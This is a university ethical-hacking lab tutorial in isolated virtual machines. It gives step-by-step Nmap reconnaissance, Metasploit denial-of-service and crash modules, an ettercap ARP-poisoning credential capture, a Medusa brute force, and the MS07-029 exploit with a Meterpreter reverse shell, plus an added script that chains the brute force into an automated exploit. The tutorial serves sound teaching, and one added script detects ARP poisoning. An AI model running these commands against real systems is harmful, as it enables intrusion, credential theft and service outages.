ethical hacking tutorial
TRANSCRIPT
UNIVERSITY OF DERBY
1 | P a g e
Hacking in Action – Tutorial
Background
Firstly, thank you for agreeing to participate in this tutorial. The results of this, as well
as the survey which you will be asked to complete following this session, will contribute
to a dissertation investigating the feasibility of using virtual environments to teach
ethical hacking in educational institutions.
Hacking is a sensitive subject when studying IT security; however, it is widely argued that the
best defensive measures come from understanding how services are infiltrated and
disrupted. Therefore this tutorial, although highly simplified, will put you in the
seat of an ethical attacker who is employed to test the defensive measures in place on a
corporate network. The purpose of this is to provide a conceptual understanding of both
the mentality and the techniques used by an ethical hacker.
The tutorial will begin by initiating four virtual machines found on the local computer.
You will be using a well-recognized suite of tools used by professional security
consultants which have been collated to form a Linux distribution known as BackTrack.
Once all of the virtual machines have fully loaded, and you have logged into BackTrack,
you will use a tool known as Nmap to conduct reconnaissance on the local network in
order to determine the IP (Internet Protocol) addresses of hosts connected to the local
subnet. Nmap will also be used to discover the Operating System (OS) used by each
host, and their respective services (indicated by banners and port numbers). Once the
local network is mapped, and sufficient knowledge of each host is ascertained, you will
move on to use the Metasploit Framework to conduct four attacks. These attacks will
involve:
Remotely executing a Denial of Service (DoS) attack on a File Transfer Protocol
(FTP) server.
Exploiting an out-of-bounds function table dereference in Server Message Block
(SMB) requests, causing a Blue Screen of Death (BSoD).
Poisoning Address Resolution Protocol (ARP) caches in order to intercept
Secure Sockets Layer (SSL) traffic and obtain a user’s credentials, better known
as a Man-in-the-Middle (MITM) attack.
Using a brute force tool to discover the password of an administrator account,
and then obtaining SYSTEM-level access (the Windows equivalent of root) to that
server by exploiting a stack buffer overflow in the Remote Procedure Call (RPC)
interface of the Microsoft Domain Name System (DNS) service. That access will then
be used to enable and open a Remote Desktop Protocol (RDP) session.
This tutorial is designed to be enjoyable, but also educational, and you are reminded
that it is a criminal offence to repeat these attacks without written authorisation from
the organization, and individuals involved. Finally, due to the nature of this study,
although the virtual machines are completely isolated and are unable to communicate
with the University network or public network, there is monitoring software in use to
ensure that any attempts to breach these security measures are logged.
Prelude
To begin, please open the team of virtual machines in VMware Workstation:
1. Click the start “Windows” button.
2. Then go to ‘Computer’ and open the root drive (C:\). Locate and open the
‘StudentVMs’ folder, followed by ‘STUART BUTCHER’ and finally ‘Hacking_Final’.
3. The ‘Hacking_Final’ folder contains all of the virtual machines needed for this
tutorial. Begin the tutorial by double-clicking the ‘Hacking_Final.vmtm’ file.
4. You will be greeted with ‘VMware Workstation’ application displaying the
‘Hacking_Final’ team tab. This contains all of the virtual machines.
5. With the team open, click ‘Power on this team’ in the ‘Commands’ box. This will start
the boot up process.
The servers will start up in a particular order and take approximately 5
minutes before they are ready for use.
6. The virtual machines are ready for use when they display the ‘Press Ctrl-Alt-Delete
to logon’ screen.
To change between virtual machines, select them in the management panel
above the console. Please be aware, if you are actively using the virtual
machine, i.e. controlling its mouse, you will need to press ‘CTRL + ALT’ to
return to the host.
Reconnaissance
The first task is to determine what else is on the local network and what each active
host is responsible for. To do this, we will be using a tool known as Nmap included with
BackTrack.
1. In the VMware Workstation window, take control of the ‘ATTACKER’ virtual
machine by selecting it from the
management panel above the
console.
2. Click the mouse anywhere on the virtual machine console window to take
control of it. You will see a prompt ‘bt login:’ at the bottom of the window. Type
the username ‘attacker’ and press return. You will be asked for the password,
which is ‘attacker’.
You will not be able to see the password input. If you enter it incorrectly,
you will need to repeat the process.
3. Following successful log on, the
graphical user interface will
populate and a shell window will
automatically appear.
4. If a shell window does not automatically appear, click the ‘Konsole’ application
icon on the bottom menu bar.
5. Before it is possible to discover other devices on the local subnet, the attacker
needs to know which subnet they belong to. To do this, type ‘ifconfig eth0’ into the
shell window and press return.
6. Take a note of the IP address and subnet mask.
7. The local IP address is set to 172.172.1.10 with a subnet mask of 255.255.255.0.
This means that the network address is 172.172.1.0, and the subnet is written as
172.172.1.0/24 (the /24 being the 24 one-bits of the mask). To discover other devices
within the subnet, type ‘sudo nmap -sP 172.172.1.0/24’ into the shell window. ‘-sP’ is
a ping sweep: it reports which addresses respond without port scanning them (newer
Nmap releases call this ‘-sn’ and still accept ‘-sP’). The ‘sudo’ command runs the
command with administrative privileges, which Nmap needs in order to send raw ARP and
ICMP probes, and you may therefore be prompted for a password. If this happens,
type ‘attacker’. Please note, all commands are case sensitive.
8. Nmap reports four hosts up. One of them, 172.172.1.10, is BackTrack itself, so
there are three other hosts on the local subnet:
a. 172.172.1.20
b. 172.172.1.100
c. 172.172.1.101
9. With the IP addressing information ascertained, it is now possible to acquire
brief details of what services each host is responsible for. To do this, type ‘sudo
nmap -v -O {Target IP}’ (‘-O’ enables operating system detection, which also requires
root privileges, and ‘-v’ gives verbose output).
10. From the targeted scan, Nmap reveals its operating system guess, the network
interface card MAC address (visible only because BackTrack shares the Ethernet
segment with the target), and the open ports. The ports highlight the services running
on the target. Repeat the scan for the remaining hosts.
(Screenshot callouts: open ports; services used by ports; network interface card MAC;
operating system information.)
11. Although there is now a basic understanding of what ports and services are in
use, it is possible to obtain more detailed information by interrogating the services
themselves. For example, the virtual machine with IP address 172.172.1.101 indicates
it is running Internet Information Services (IIS) to power its web server, but it does
not advertise which version. To discover the version of IIS, type ‘sudo nmap -A -T4 -F
172.172.1.101’. ‘-A’ enables OS detection, service version detection, script scanning
and traceroute; ‘-T4’ selects an aggressive timing template; ‘-F’ restricts the scan to
the most common ports. Repeat the scan on the remaining hosts.
With some FTP servers, it is possible to gain specific system information by
connecting to port 21 with Telnet (‘telnet 172.172.1.101 21’) and typing ‘SYST’; some
servers only answer this command after a login.
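The reconnaissance steps above, scripted. This is an added example and not part of the original tutorial; the ‘ifconfig eth0’ and ‘nmap -sP’ output it parses is constructed to match the tutorial’s addresses, and the MAC addresses in it are made up. It derives the sweep range from the attacker’s own address and mask rather than assuming /24, and drops BackTrack’s own address from the list of live hosts, which is the point step 8 makes.

```shell
#!/bin/sh
# Added example, not part of the original tutorial: work out the sweep range
# from the attacker's own address and mask (steps 5-7), then pull the live
# hosts out of Nmap's ping-sweep report, dropping BackTrack itself (step 8).
# Both outputs below are constructed to match the tutorial; MACs are made up.

SAMPLE_IFCONFIG='eth0      Link encap:Ethernet  HWaddr 00:0c:29:aa:bb:cc
          inet addr:172.172.1.10  Bcast:172.172.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1'

SAMPLE_NMAP='Starting Nmap 5.21 ( http://nmap.org )
Nmap scan report for 172.172.1.10
Host is up.
Nmap scan report for 172.172.1.20
Host is up (0.00031s latency).
MAC Address: 00:0C:29:11:22:33 (VMware)
Nmap scan report for 172.172.1.100
Host is up (0.00042s latency).
MAC Address: 00:0C:29:44:55:66 (VMware)
Nmap scan report for vict-srv-web1 (172.172.1.101)
Host is up (0.00037s latency).
MAC Address: 00:0C:29:77:88:99 (VMware)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.51 seconds'

# Number of set bits in a dotted-quad mask: 255.255.255.0 -> 24.
mask_to_prefix() {
    prefix=0
    for octet in $(printf '%s' "$1" | tr '.' ' '); do
        while [ "$octet" -gt 0 ]; do
            prefix=$((prefix + (octet & 1)))
            octet=$((octet >> 1))
        done
    done
    echo "$prefix"
}

# Network address of ip/mask in CIDR form: 172.172.1.10 255.255.255.0 -> 172.172.1.0/24.
network_cidr() {
    ip=$1; mask=$2
    set -- $(printf '%s %s' "$ip" "$mask" | tr '.' ' ')   # $1-$4 ip octets, $5-$8 mask octets
    printf '%d.%d.%d.%d/%d\n' $(($1 & $5)) $(($2 & $6)) $(($3 & $7)) $(($4 & $8)) \
        "$(mask_to_prefix "$mask")"
}

# Old-style 'ifconfig eth0' output on stdin -> "ip mask" from its first inet line.
ifconfig_addr() {
    awk -F'[: ]+' '/inet addr:/ {
        for (i = 1; i <= NF; i++) { if ($i == "addr") ip = $(i+1); if ($i == "Mask") mask = $(i+1) }
        print ip, mask; exit }'
}

# 'ifconfig eth0' output on stdin -> the range to hand to nmap -sP.
scan_range() {
    ifconfig_addr | while read -r ip mask; do network_cidr "$ip" "$mask"; done
}

# nmap -sP report on stdin -> live addresses, one per line, excluding $1 (the scanner).
live_hosts() {
    awk -v self="$1" '
        /^Nmap scan report for/ { ip = $NF; gsub(/[()]/, "", ip) }      # Nmap 5.x style
        /^Host is up/           { if (ip != self && ip != "") print ip; ip = "" }
        /appears to be up/      { if ($2 != self) print $2 }             # older "Host x appears to be up"
    '
}

range=$(printf '%s\n' "$SAMPLE_IFCONFIG" | scan_range)
echo "sweep range: $range"                                   # 172.172.1.0/24
printf '%s\n' "$SAMPLE_NMAP" | live_hosts 172.172.1.10       # the three victims
# On BackTrack the live equivalent is:
#   sudo nmap -sP "$(ifconfig eth0 | scan_range)" | live_hosts 172.172.1.10
```

The filter in live_hosts accepts both the ‘Nmap scan report for’ lines of Nmap 5 and the older ‘Host … appears to be up’ form, so the same pipeline works with either output style.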
Attacks
With what is now known about the other hosts on the local subnet, it is possible
to look for vulnerabilities on each. Discovered vulnerabilities are published in the
‘National Vulnerability Database’, where each receives a CVE identifier, so that
administrators can protect their systems and vendors can update their software. The
information gathered about each host, and the potential vulnerabilities available to
be exploited, are shown below.
172.172.1.20 – VICT-CLI01
This host is using Windows XP SP2 or SP3, which may make it vulnerable to a stack
corruption in the path canonicalisation code of the Server service (MS08-067,
CVE-2008-4250). That flaw allows unauthenticated remote code execution with SYSTEM
privileges over SMB. This tutorial does not exploit it; the client is instead used as
the victim of the Man-in-the-Middle attack.
172.172.1.100 – VICT-SRV01
172.172.1.100 appears to be responsible for DNS, Active Directory, web service and
e-mail. It is also using the Windows Server 2003 operating system. Therefore, this host
may be vulnerable to an exploit of the RPC interface of the DNS service (MS07-029,
CVE-2007-1748). Additionally, as this host also appears to be responsible for e-mail
services, it could be possible to conduct a Man-in-the-Middle attack on the HTTPS
traffic when a user logs in to their mailbox.
172.172.1.101 – VICT-SRV-WEB1
This virtual machine appears to have two interesting services, FTP and HTTP. This
suggests that the server is hosting one or more web pages as well as providing a file
download/upload service. Additionally, it is clear that the server is using a
Server 2008 based operating system.
As this host is using IIS 7.0, it is likely that the FTP server is the separately
downloaded FTP 7.5 release. Therefore, it may be vulnerable to a Denial of Service
attack as a result of a heap overflow (MS11-004, CVE-2010-3972). Further to this, Nmap
has indicated that it is using SMB v2, which is known to be vulnerable to an array
index error when an ampersand character is supplied in the Process ID High field of
the NEGOTIATE request. This triggers an attempted dereference of an out-of-bounds
memory location, and consequently results in a Blue Screen of Death (MS09-050,
CVE-2009-3103).
IIS FTP 7.5 DoS
It is possible to terminate the FTP service on a Windows server if it is running
Microsoft FTP Service 7.5. The vulnerability lies in the handling of Telnet IAC (0xFF)
bytes: when the server builds its response to a command containing a run of 0xFF
bytes, it writes past the end of a heap buffer, and the resulting heap buffer overrun
crashes the service (CVE-2010-3972). This can be demonstrated in the Metasploit
Framework with an auxiliary (DoS) module. Note that a DoS module has no harmless mode:
once it runs, the service is down until someone restarts it, so double-check the target
address before launching it.
1. Change control of the virtual machines to ‘VICT-SRV-
WEB1’. If control is currently focused on a different
virtual machine, then press ‘CTRL+ALT’. This will
return control to the host computer.
2. Login by hitting ‘CTRL+ALT+INSERT’ and typing
‘H4ckM3!’ as the password.
3. Once logged in, click the ‘Start’ button
and type ‘services.msc’ into the search
bar, followed by hitting the return key.
4. A window containing all system services will be populated. Scroll through the list
of services to find ‘Microsoft FTP Service’. It will show the service as ‘Started’.
5. Change control back to the ‘ATTACKER’ virtual machine and open a shell
window.
6. Verify that it is possible to connect to the FTP server by typing ‘ftp 172.172.1.101’.
If the FTP server is running and accepting new connections then it will display
the welcome banner (‘220 Microsoft
FTP Service’) and will prompt for a
login name.
7. Hit return twice and then type ‘quit’.
8. Type ‘sudo msfconsole’. If prompted for a password, enter ‘attacker’. It may take a
short while to load.
9. Select the module to be used by typing
‘use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof’ followed by hitting the return
key.
10. Next, select the target by typing ‘set RHOST 172.172.1.101’. The module’s RPORT
defaults to 21; ‘show options’ confirms the settings before launch.
11. Launch the attack by typing ‘run’.
12. The attack will be launched. A completion message will be returned following the
execution.
13. Change back to ‘VICT-SRV-WEB1’ and refresh the ‘Services’ window. Do not
close the shell window on BackTrack.
14. Find ‘Microsoft FTP Service’ and notice that it is no longer ‘Started’.
The FTP service is no longer running; from BackTrack, repeating ‘ftp 172.172.1.101’
now fails to connect. The attack has been successful.
Server Message Block (SMB) Blue Screen of Death (BSoD)
The reconnaissance also identified that ‘VICT-SRV-WEB1’ uses SMBv2, which has a
known vulnerability in its handling of the NEGOTIATE request (CVE-2009-3103). A
successful exploit of this vulnerability executes code with system-level privileges;
a failed attempt crashes the kernel, giving a Denial of Service condition. The
auxiliary module used here does not attempt code execution at all: it simply sends
the malformed request that triggers the crash (Metasploit’s separate exploit module
for MS09-050 is the one that attempts code execution).
1. On BackTrack, from the shell window used previously, type ‘use
auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh’.
If you closed the shell window, open a new window and type ‘sudo
msfconsole’ to start Metasploit again.
2. Set the target by entering ‘set RHOST {Target IP}’.
3. Execute the attack by typing ‘run’.
4. When the attack completes, change to the ‘VICT-SRV-WEB1’ virtual machine.
5. The virtual machine should be displaying a Blue Screen of Death. The stop error
may name the faulting kernel component; CVE-2009-3103 lies in srv2.sys, the SMB 2
server driver, and the crash is the attempted dereference of an out-of-bounds memory
location described above.
6. Return to the ‘ATTACKER’ and type ‘exit’ to leave msfconsole.
The victim will automatically reboot. The attack has been successful. A kernel crash
discards whatever the server was doing at the time, which is why a DoS test of this
kind needs explicit agreement from the system owner.
Secure Sockets Layer (SSL) Man-in-the-Middle Attack
Nmap revealed that there is an XP machine on the network. This is most likely a user’s
computer. Nmap also suggested that 172.172.1.100 is the mail server. Therefore, it is
possible to poison the client’s ARP cache so that its traffic for the mail server
passes through BackTrack, and to intercept the SSL session by acting as a middle-man.
The interceptor cannot present the mail server’s real certificate, so it substitutes
its own; the only sign the user sees is that the certificate’s issuer has changed, and
the attack works only because the user clicks through that warning.
1. Change control to ‘VICT-CLI01’
and press ‘CTRL+ALT+INSERT’.
Enter ‘thevictim’ as the username
and ‘Password01’ as the
password.
2. Click the ‘Start’ button and open ‘Internet Explorer’.
3. When the page begins to load, a security alert window will appear. Internet
Explorer warns here even though no attack is under way, which is why the issuer must
be noted now for comparison later. Click ‘View Certificate’.
4. The certificate will display three tabs, ‘General’, ‘Details’, and ‘Certification Path’.
Open the ‘Details’ tab.
5. The details tab contains all of the information relating to the site certificate.
Take a note of the ‘Issuer’ and information within the text box below.
6. Click ‘OK’ and then click ‘Yes’ on the security alert window.
7. Enter the username ‘thevictim’ and password ‘Password01’. Then click ‘Log On’.
8. The user’s inbox will now be displayed. Click ‘Log Off’ and then close the
window.
9. Change control to the ‘ATTACKER’ and from within a shell window type ‘sudo
ettercap -Tq -i eth0 -M arp:remote,oneway /172.172.1.20/ /172.172.1.100/’. If
prompted, enter the password ‘attacker’. ‘-Tq’ runs ettercap in quiet text mode,
‘-i eth0’ selects the interface, and ‘-M arp:remote,oneway’ poisons only the first
target’s ARP cache (the client), so that the client sends its traffic for
172.172.1.100 to BackTrack’s MAC address. Ettercap’s SSL interception relies on its
redirect rules being enabled in /etc/etter.conf; the tutorial VM is assumed to have
this already configured.
10. ARP caches are now being poisoned. Change back to ‘VICT-CLI01’. If the virtual
machine is locked, press ‘CTRL+ALT+INSERT’ and type ‘thevictim’ for the
username and ‘Password01’ for the password.
11. Click the ‘Start’ button and open ‘Internet Explorer’. When the security alert
window displays, click ‘View Certificate’.
12. Click the ‘Details’ tab and take a note of the ‘Issuer’.
13. The difference in issuer demonstrates that SSL traffic is being intercepted: the
certificate now shown was generated by ettercap, not by the mail server.
14. Click ‘OK’ and then ‘Yes’ to continue loading the web page.
15. Enter the username ‘thevictim’ and password ‘Password01’ on the login page and
then click ‘Log On’ to load the user’s inbox.
16. Once successfully logged in, change control back to ‘ATTACKER’ and notice that
the captured username and password are printed in the shell window.
17. In the shell window, type ‘q’ and the sniffing and poisoning will terminate.
Ettercap re-ARPs the victims on exit so that the client’s cache is restored.
18. Return to ‘VICT-CLI01’ and click ‘Log off’. If the virtual machine is locked,
enter ‘thevictim’ as the username and ‘Password01’ as the password.
19. Shut down the ‘VICT-CLI01’ virtual machine by clicking the ‘Start’ button and
then ‘Shut down’. Click ‘OK’ on the next window.
That concludes the Man-in-the-Middle attack.
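How the poisoning looks from the victim’s side. This is an added example, not part of the original tutorial, showing the check a defender (or a tester confirming that the attack took effect) would run against VICT-CLI01’s ARP cache: after step 9 the client maps 172.172.1.100 to BackTrack’s MAC address, so two IP addresses share one MAC and the mail server’s entry differs from its baseline. Both ‘arp -a’ tables are constructed, with made-up MAC addresses; only the IP addresses are the tutorial’s.

```shell
#!/bin/sh
# Added example, not part of the original tutorial: victim-side detection of
# the ARP poisoning. Both tables are constructed (MACs made up): BEFORE is
# VICT-CLI01's cache before ettercap starts, AFTER is the same cache once
# 172.172.1.100 has been poisoned to BackTrack's MAC.

BEFORE='Interface: 172.172.1.20 --- 0x2
  Internet Address      Physical Address      Type
  172.172.1.10          00-0c-29-aa-bb-cc     dynamic
  172.172.1.100         00-0c-29-44-55-66     dynamic
  172.172.1.101         00-0c-29-77-88-99     dynamic'

AFTER='Interface: 172.172.1.20 --- 0x2
  Internet Address      Physical Address      Type
  172.172.1.10          00-0c-29-aa-bb-cc     dynamic
  172.172.1.100         00-0c-29-aa-bb-cc     dynamic
  172.172.1.101         00-0c-29-77-88-99     dynamic'

# Reduce a Windows 'arp -a' or Linux 'arp -n' table on stdin to "ip mac" lines,
# MAC lower-case and colon-separated so the two formats compare equal.
arp_pairs() {
    awk '$1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {
        for (i = 2; i <= NF; i++)
            if (length($i) == 17 && $i ~ /^[0-9a-fA-F][0-9a-fA-F]([-:][0-9a-fA-F][0-9a-fA-F])+$/) {
                mac = tolower($i); gsub(/-/, ":", mac); print $1, mac; break
            }
    }'
}

# MACs claimed by more than one IP, as "mac ip ip ...": the signature of a poisoned cache.
shared_macs() {
    arp_pairs | awk '{ if ($2 in ips) ips[$2] = ips[$2] " " $1; else ips[$2] = $1; n[$2]++ }
                     END { for (m in n) if (n[m] > 1) print m, ips[m] }'
}

# True (exit 0) if $1's MAC differs between the baseline table $2 and the current table $3.
mac_changed() {
    old=$(printf '%s\n' "$2" | arp_pairs | awk -v ip="$1" '$1 == ip { print $2 }')
    new=$(printf '%s\n' "$3" | arp_pairs | awk -v ip="$1" '$1 == ip { print $2 }')
    [ -n "$old" ] && [ -n "$new" ] && [ "$old" != "$new" ]
}

echo "shared MACs before poisoning: $(printf '%s\n' "$BEFORE" | shared_macs)"   # none
echo "shared MACs after poisoning:  $(printf '%s\n' "$AFTER" | shared_macs)"
if mac_changed 172.172.1.100 "$BEFORE" "$AFTER"; then
    echo "ALERT: 172.172.1.100 (VICT-SRV01) now resolves to a different MAC"
fi
# On the victim, a live check would feed 'arp -a' output to shared_macs instead of AFTER.
```

The baseline comparison is the stronger of the two checks; the shared-MAC test needs no baseline but only catches the case where the attacker answers with its own address, as ettercap does here. A static ARP entry for critical hosts removes the problem rather than detecting it.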
Domain Name System (DNS) Remote Procedure Call (RPC) Service Transmission
Control Protocol (TCP) Overflow
Nmap identified that the server with IP address 172.172.1.100 is not only an e-mail
server but also responsible for DNS and Active Directory. Unfortunately, Nmap also
suggested that the system is relatively unpatched, and a known vulnerability in that
particular OS and service pack (MS07-029, CVE-2007-1748) is a stack buffer overflow in
the RPC interface of the DNS service. It is triggered when a long zone name parameter
containing escaped octal strings is supplied in a TCP request. As the DNS service runs
as Local System, a successful exploit gives system-level access. However, in order to
take control of the server’s graphical user interface over Remote Desktop, the
administrator credentials must also be known. For this part, it is assumed that the
administrator username is ‘Administrator’.
1. On the ‘ATTACKER’ machine, minimise the shell window if
there is one open.
2. On the desktop, there is a file titled
‘passwords’. Click on it to open it. When
prompted, click ‘Open Session’.
3. A text file containing a list of passwords
will be displayed.
4. Close this window by clicking the ‘X’ at the top right of the window.
5. Restore the shell window, or open a new one if there was not one already open.
6. Start the brute forcing tool known as Medusa by typing ‘medusa -h 172.172.1.100
-u Administrator -P /home/attacker/passwords -f -F -M smbnt’ followed by the
return key. ‘-h’ is the target host, ‘-u’ the username, ‘-P’ the password list,
‘-M smbnt’ the SMB authentication module, ‘-f’ stops once a valid password is found
for this host, and ‘-F’ stops the whole audit once any valid pair is found.
7. Medusa will run through all of the passwords in the file checking to see if there
is a match. When it finds the correct one, it will display a line ending ‘[SUCCESS]’.
Every failed guess is recorded in the server’s Security event log and, for ordinary
accounts, would count towards any account lockout threshold, so a list of this kind
would be noisy and risky against a real domain controller.
8. Take a note of the password and run Metasploit by typing ‘sudo msfconsole’. If
prompted for the password, type
‘attacker’.
9. When Metasploit has loaded, type
‘use exploit/windows/dcerpc/ms07_029_msdns_zonename’ and hit return.
10. Select the payload type to be used by typing ‘set PAYLOAD
windows/meterpreter/reverse_tcp’ followed by the return key. A reverse payload makes
the victim connect back to the attacker, which passes firewalls that only block
inbound connections.
11. Define the address the payload will connect back to, which is BackTrack’s own
address, by typing ‘set LHOST 172.172.1.10’.
12. Enter the target address by typing ‘set RHOST 172.172.1.100’.
13. Type ‘exploit’ to execute the attack.
14. If the attack is successful, a Meterpreter session with the server will be
established.
15. To enable Remote Desktop on the server, type ‘run getgui -e’ in the Meterpreter
session.
16. Open a new shell window. When the prompt displays, type ‘rdesktop -u
Administrator -p H4ckM3! 172.172.1.100’ and press return, where H4ckM3! is the
password Medusa recovered. (Passing the password on the command line makes it
visible in the process list: acceptable here, not on a shared host.)
17. Once logged in, click ‘Start’ followed by ‘Shut Down’.
18. It is not possible to shut the server down
unless a comment is given. In the comment
box, press space and then click ‘OK’.
19. The server will warn that other users will
be disconnected. Click ‘Yes’ to continue.
20. The server will now begin the
shutdown process. Confirm this
by changing control to the ‘VICT-
SRV01’ virtual machine.
When the server shuts down, this attack is completed. In a production environment,
the loss of the e-mail server and domain controller would result in major disruption
to a business.
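The brute force and exploit steps above as one script. This is an added example, not part of the original tutorial: it parses Medusa’s output so that the exploit only runs once a password has actually been recovered, validates both addresses before writing a Metasploit resource script that mirrors steps 9-13, and leaves ‘run getgui -e’ and rdesktop to be done by hand in the session. The Medusa output used for the dry run is constructed; the host, username, wordlist path and module names are the tutorial’s, while the ‘--run’ flag and the /tmp/ms07_029.rc path are this example’s own.

```shell
#!/bin/sh
# Added example, not part of the original tutorial: chain the brute force and
# the exploit so the exploit only runs once Medusa has recovered a password.
# SAMPLE_MEDUSA is constructed output; the live branch (--run) is only for BackTrack.

SAMPLE_MEDUSA='ACCOUNT CHECK: [smbnt] Host: 172.172.1.100 (1 of 1, 0 complete) User: Administrator (1 of 1, 0 complete) Password: Password01 (1 of 3 complete)
ACCOUNT CHECK: [smbnt] Host: 172.172.1.100 (1 of 1, 0 complete) User: Administrator (1 of 1, 0 complete) Password: H4ckM3! (2 of 3 complete)
ACCOUNT FOUND: [smbnt] Host: 172.172.1.100 User: Administrator Password: H4ckM3! [SUCCESS]'

# Print the password from Medusa's success line; exit status 1 if there is none.
medusa_password() {
    awk '/^ACCOUNT FOUND:/ && /\[SUCCESS\]/ {
             for (i = 1; i <= NF; i++) if ($i == "Password:") { print $(i + 1); found = 1; exit }
         }
         END { exit !found }'
}

# Accept only a dotted-quad IPv4 address, so a typo cannot aim the exploit elsewhere.
valid_ip() {
    printf '%s\n' "$1" | awk -F. 'NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }'
}

# Resource script for 'msfconsole -r' mirroring steps 9-13 of the tutorial.
msf_resource() {   # $1 = LHOST (BackTrack), $2 = RHOST (VICT-SRV01)
    valid_ip "$1" && valid_ip "$2" || return 1
    printf '%s\n' \
        'use exploit/windows/dcerpc/ms07_029_msdns_zonename' \
        'set PAYLOAD windows/meterpreter/reverse_tcp' \
        "set LHOST $1" \
        "set RHOST $2" \
        'exploit'
}

if [ "${1:-}" = "--run" ]; then
    # Live run on BackTrack: brute force first, abort if nothing was found.
    pass=$(medusa -h 172.172.1.100 -u Administrator -P /home/attacker/passwords -f -F -M smbnt \
           | medusa_password) || { echo 'no password recovered; not running the exploit' >&2; exit 1; }
    msf_resource 172.172.1.10 172.172.1.100 > /tmp/ms07_029.rc
    sudo msfconsole -r /tmp/ms07_029.rc
    echo "in the Meterpreter session run 'getgui -e', then: rdesktop -u Administrator -p '$pass' 172.172.1.100"
else
    # Dry run on the constructed output.
    printf '%s\n' "$SAMPLE_MEDUSA" | medusa_password        # H4ckM3!
    msf_resource 172.172.1.10 172.172.1.100
fi
```

Run it without arguments for the dry run; with ‘--run’ it executes medusa, then ‘sudo msfconsole -r’ on the generated resource file, and stops before the exploit if Medusa printed no ‘[SUCCESS]’ line.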
Cleaning Up
To complete the tutorial, shut down the remaining virtual machines:
1. Take control of ‘VICT-SRV-WEB1’ and press ‘CTRL+ALT+INSERT’ to log in.
Use the username ‘Administrator’ and password ‘H4ckM3!’.
2. If asked for a reason why the server
unexpectedly shut down, hit the spacebar in
the comments box followed by ‘OK’.
3. Once logged in, click the ‘Start’ button
followed by the right arrow button next to
the padlock icon.
4. When ‘Shut Down’ becomes visible, click it.
5. If asked for a reason for shut down, press the spacebar in the comments box and
click ‘OK’.
6. The server will begin the shutdown sequence. Change control to the ‘ATTACKER’
virtual machine.
7. Close any shell windows that may be open, and click the far left icon on menu
bar.
8. When the panel displays, click ‘Log Out’. Another window will
appear. Click ‘Log Out’ on this new window.
9. Once the graphical user interface has closed, click anywhere in
the console window to ensure it is taking keyboard input. Type
‘sudo poweroff’. When prompted, enter the password ‘attacker’.
10. The system will now begin shutting down. When all virtual machines have shut
down, the ‘Hacking_Final’ home tab will be displayed in ‘VMware Workstation’.
Thank you for taking part in this investigation. Please complete the online
survey. The password for the survey is ‘Attacker’.